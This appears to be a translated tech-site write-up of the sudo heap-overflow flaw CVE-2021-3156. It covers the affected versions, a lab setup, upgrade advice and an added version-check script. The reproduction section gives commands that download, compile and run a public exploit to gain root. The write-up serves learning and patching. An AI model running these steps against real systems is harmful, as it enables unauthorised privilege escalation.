
Example Analysis of Sudo overflow vulnerability CVE-2021-3156

2025-01-15 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31

This article shares an example analysis of the sudo overflow vulnerability CVE-2021-3156. It is quite practical, so it is shared here for everyone to learn from.

0x00 Introduction

sudo is a Linux system administration command that lets system administrators allow regular users to execute some or all root commands, such as halt, reboot, and su. This not only reduces root logins and administration time, but also improves security. sudo is not a replacement for the shell; it is command-oriented.

0x01 Vulnerability Overview

On January 26, 2021, a heap-based buffer overflow vulnerability in sudo was disclosed (CVE-2021-3156, named Baron Samedit) that could lead to local privilege escalation.

On Unix-like operating systems, non-root users can use the sudo command to execute commands as root. Because sudo incorrectly escapes backslashes in arguments, a heap buffer overflow occurs that allows any local user (whether in the sudoers file or not) to gain root privileges without authentication and without knowing the user's password.

0x02 Affected versions

sudo 1.8.2 - 1.8.31p2

sudo 1.9.0 - 1.9.5p1

0x03 Environment setup

This environment uses Ubuntu 19.04.

1. Official download address: old-releases.ubuntu.com/releases/19.04/

2. Do a minimal installation in a VMware virtual machine. (Search Baidu for the specific installation process.)

0x04 Vulnerability reproduction

1. Enter sudo --version in the terminal to view the sudo version, and use whoami to view the current user.

2. Use the exploit (exp) on GitHub to exploit the vulnerability; download it with wget or git:

wget https://hub.fastgit.org/blasty/CVE-2021-3156/archive/main.zip

unzip main.zip

3. Enter the decompressed directory and compile it into an executable file using make.

cd CVE-2021-3156-main/

make

4. Run the compiled file with ubuntu as its argument; you can see that you now have root privileges (Debian systems can also be used).

./sudo-hax-me-a-sandwich ubuntu

0x05 Remediation

The vendor has fixed this vulnerability in the new sudo version 1.9.5p2. Upgrade affected versions as soon as possible.

Download address: www.sudo.ws/download.html
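
A version check against the ranges in 0x02, as an added example that is not part of the original article: it parses `sudo --version` output and compares the version with the affected ranges, treating a missing pN suffix as p0. The sample output and all function names are constructed here; distribution packages may backport the fix without changing the upstream version, so treat an in-range result as a prompt to check the vendor advisory.

```python
import re
import subprocess

# Affected upstream ranges exactly as listed in section 0x02 (inclusive).
AFFECTED = [("1.8.2", "1.8.31p2"), ("1.9.0", "1.9.5p1")]

_VER = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")

# Constructed sample of `sudo --version` output (not captured from a real host).
SAMPLE_OUTPUT = """Sudo version 1.8.27
Sudoers policy plugin version 1.8.27
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.27
"""


def parse(version):
    """Turn '1.8.31p2' into (1, 8, 31, 2); a missing pN suffix counts as p0."""
    m = _VER.search(version)
    if not m:
        raise ValueError(f"unrecognised sudo version: {version!r}")
    return tuple(int(g or 0) for g in m.groups())


def version_from_output(output):
    """Return the version string from the 'Sudo version X' line."""
    for line in output.splitlines():
        if line.startswith("Sudo version "):
            return line.split()[2]
    raise ValueError("no 'Sudo version' line in output")


def in_affected_range(version):
    """True if the upstream version falls inside a range from section 0x02."""
    v = parse(version)
    return any(parse(lo) <= v <= parse(hi) for lo, hi in AFFECTED)


if __name__ == "__main__":
    try:
        out = subprocess.run(["sudo", "--version"], capture_output=True,
                             text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        out = SAMPLE_OUTPUT  # fall back to the constructed sample
    ver = version_from_output(out)
    state = "in an affected range" if in_affected_range(ver) else "outside the affected ranges"
    print(f"sudo {ver}: {state}")
```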

The above is an example analysis of the sudo overflow vulnerability CVE-2021-3156. Some of these points may come up or be useful in daily work.
